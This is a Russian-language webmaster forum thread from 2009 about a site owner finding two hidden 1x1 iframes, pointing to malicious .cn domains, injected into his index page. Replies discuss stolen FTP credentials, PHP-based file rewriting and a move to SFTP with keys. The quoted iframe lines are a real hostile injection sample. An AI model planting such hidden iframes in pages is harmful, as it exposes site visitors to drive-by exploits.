С нами с 23.03.09
Сообщения: 14
Рейтинг: 3
|
Добавлено: 12/04/09 в 20:54 |
доделывал топ, надо было добавить кое что в индекс.схтмл, и случайным образом наткнулся на строчку в коде
<iframe src="http://lotante.cn/in.cgi?income38" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://thelotbet.cn/in.cgi?income40" width=1 height=1 style="visibility: hidden"></iframe>
вопос: откуда она там могла взяться? права вроде настроены так что индекс могу менять только я... если ктонить встречался с этим помогите плиз!
|
|
|
|
С нами с 01.04.07
Сообщения: 4378
Рейтинг: 2970
|
Добавлено: 12/04/09 в 20:59 |
Может пароль от ФТП свистнули. Сходи в венерологический.
|
|
|
|
Добрый ОС :=)
С нами с 12.04.04
Сообщения: 8343
Рейтинг: 3293
|
Добавлено: 12/04/09 в 21:34 |
Это вирус 100%. Мне такую же хрень на всех сайтах на одном хосте повесили, задолбался чистить Антивир (нод не реагирует на него), загружает адоб ридер в процессы. Вопрос: как такое могли сделать? На сервере много доменов, каждый с разным фтп доступом.
|
|
|
|
С нами с 09.03.09
Сообщения: 6053
Рейтинг: 3538
|
Добавлено: 12/04/09 в 21:45 |
|
|
|
|
+
сам дебил
С нами с 25.07.06
Сообщения: 5379
Рейтинг: 1822
|
Добавлено: 12/04/09 в 22:41 |
чекай свою систему локальную если на всех фтп аккаунтах так
|
|
|
|
С нами с 22.03.09
Сообщения: 1691
Рейтинг: 2478
|
Добавлено: 13/04/09 в 01:23 |
Тоже самое было. Трояном вытянули пароль к фтп видимо.
Добрые люди посоветовали авиру(http://www.free-av.com/) и всё стало впорядке, как после нода нашёл 35 вирусов
Подумываю перейти на платную версию авиры
|
|
hostiserver.com - Хостинг под КВС и Смарт, чтобы работало быстро
|
0
|
|
|
С нами с 18.11.99
Сообщения: 14226
|
Добавлено: 13/04/09 в 01:47 |
Ставь SFTP и оставляй доступ только со своего IP.
И все проблемы исчезнут.
|
|
|
|
С нами с 22.03.09
Сообщения: 1691
Рейтинг: 2478
|
Добавлено: 13/04/09 в 01:48 |
а если айпи динамический?)
|
|
hostiserver.com - Хостинг под КВС и Смарт, чтобы работало быстро
|
0
|
|
|
С нами с 10.04.04
Сообщения: 2526
Рейтинг: 1447
|
Добавлено: 13/04/09 в 02:58 |
WASP писал: | Это вирус 100%. Мне такую же хрень на всех сайтах на одном хосте повесили, задолбался чистить Антивир (нод не реагирует на него), загружает адоб ридер в процессы. Вопрос: как такое могли сделать? На сервере много доменов, каждый с разным фтп доступом. |
Делают обычно так - злоумышленник получает доступ к одному из фтп, заливает специальный пхп файл, запускает его через хттп, этот файл ищет и изменяет html файлы.
|
|
Это не я должен предлагать тебе деньги, а ты должен убедить меня заплатить тебе.
|
0
|
|
|
С нами с 21.09.03
Сообщения: 7329
Рейтинг: 2144
|
Добавлено: 13/04/09 в 03:41 |
nosferatu писал: | а если айпи динамический?)
|
Делай доступ по ключам, а не по логину/паролю. Ключ можешь в USB token засунуть в неэкспортируемом виде, тогда точно никто никогда не стырит...
|
|
|
|
С нами с 09.03.09
Сообщения: 6053
Рейтинг: 3538
|
Добавлено: 13/04/09 в 04:10 |
Сплоит относительно новый и в паблике его нет. Пока. )
Так что господа сиджеводы - готовьтесь.
Заражение происходит при посещении инфицированных страницы. Если при этом в браузере разрешено выполнение JScript и у вас есть права администратора, то вы попали. Однозначно.
И никакие антивирусы вас не спасут, так как это не просто "вирус" (если быть точным, то это вообще не вирус), а набор скриптов, эксплуатирующих различные актуальные уязвимости. И полагать, что после того как антивирус отрапортовал об удалении "вируса", вы чисты - просто наивно.
А если антивирус даже не среагировал и вы продолжали работать, то чего уж тогда удивлятся, что у вас утянули пароли.
Никакие баны по IP, как вы понимаете - не помогут, так как шелы заливаются с вашей машины.
Здесь список известных на сегодня атакующих серверов:
http://www.malwaredomainlist.com/mdl.php?inactive=&sort=Domain&
amp;page=0
Хочу ещё раз подчеркнуть, что ни один антивирус не сможет полностью удалить такую заразу, если вы работали под учётной записью администратора. А большинство из них даже не среагирует.
|
|
|
|
Прощай рейтинг
С нами с 30.11.08
Сообщения: 3180
Рейтинг: 808
|
Добавлено: 13/04/09 в 05:55 |
Yacc: Ебать страху то нагнал, я чуть винчь не отформатировал
|
|
|
|
С нами с 23.03.09
Сообщения: 14
Рейтинг: 3
|
Добавлено: 13/04/09 в 22:53 |
Вчера почистил индекс, пока нормально, попозже посмотрим что будет.
На остальных доменах пока все спокойно...
|
|
|
|
С нами с 21.09.03
Сообщения: 7329
Рейтинг: 2144
|
Добавлено: 14/04/09 в 00:14 |
Просто любопытно, хоть один чел перейдёт на sftp/RSA-key вместо FTP/логин-пароль?
|
|
|
|
С нами с 05.02.07
Сообщения: 286
Рейтинг: 222
|
Добавлено: 14/04/09 в 01:12 |
А что, кто-то еще использует ftp?
|
|
|
|
С нами с 04.03.07
Сообщения: 8931
Рейтинг: 5138
|
Добавлено: 14/04/09 в 01:41 |
на вебазилле все отфильтровано слава богу по дефолту
|
|
|
|
С нами с 09.03.09
Сообщения: 6053
Рейтинг: 3538
|
Добавлено: 14/04/09 в 01:44 |
А что кто-то ещё не знает о существование приватных сборок фтп-грабберов стоимостью $5k?
|
|
|
|
С нами с 04.03.07
Сообщения: 8931
Рейтинг: 5138
|
Добавлено: 14/04/09 в 01:58 |
кинь пару ссылок народу почитать, я тоже приватную сборку жигулей видел за двацатник
|
|
|
|
размещу
С нами с 30.12.00
Сообщения: 4800
Рейтинг: 1304
|
Добавлено: 14/04/09 в 12:09 |
оффтопик: всё же хорошая вещь - форум
если вдруг постучится к тебе трейдер какой нить новый, пробиваешь его ник на форумах, читаешь посты и отказываешь в трейде, либо просто не отвечаешь
ЗЫ: я не о тс
|
|
|
|
С нами с 04.03.07
Сообщения: 8931
Рейтинг: 5138
|
Добавлено: 14/04/09 в 12:22 |
нуда заранее себя документируют
|
|
|
|
XXX-Server.biz
С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676
|
Добавлено: 14/04/09 в 16:56 |
gimcnuk писал: | Может пароль от ФТП свистнули. Сходи в венерологический. |
скорее через скрипты поломали
|
|
|
|
+ +
www.b52hosting.com Хостинг
С нами с 10.01.08
Сообщения: 4931
Рейтинг: 147
|
Добавлено: 22/04/09 в 21:50 |
lega_cobra писал: | Просто любопытно, хоть один чел перейдёт на sftp/RSA-key вместо FTP/логин-пароль? |
Нет.
|
|
|
|
+ +
www.b52hosting.com Хостинг
С нами с 10.01.08
Сообщения: 4931
Рейтинг: 147
|
Добавлено: 22/04/09 в 21:53 |
Stup писал: | Делают обычно так - злоумышленник получает доступ к одному из фтп, заливает специальный пхп файл, запускает его через хттп, этот файл ищет и изменяет html файлы. |
Это если на сервере так настроены виртуальные хосты что через PHP можно зайти в чужую папку. А если все НОРМАЛЬНО как нада настроено - то получив доступ к одному FTP только с файлами на этом FTP можно и орудовать.
|
|
|
|
Soul's Buyer
С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740
|
Добавлено: 22/04/09 в 21:54 |
Цитата: | оффтопик: всё же хорошая вещь - форум
если вдруг постучится к тебе трейдер какой нить новый, пробиваешь его ник на форумах, читаешь посты и отказываешь в трейде, либо просто не отвечаешь
ЗЫ: я не о тс |
Оффтопик: Думаю "чё-то Teval молчит в аське на вопрос о трейде, с чего бы ... " а он, оказывается, посты перечитывает
|
|
|
|
XXX-Server.biz
С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676
|
Добавлено: 23/04/09 в 01:06 |
почему нет? у нас процентов около 5 клиентов удалось перевести )) остальные не хотят )
|
|
|
|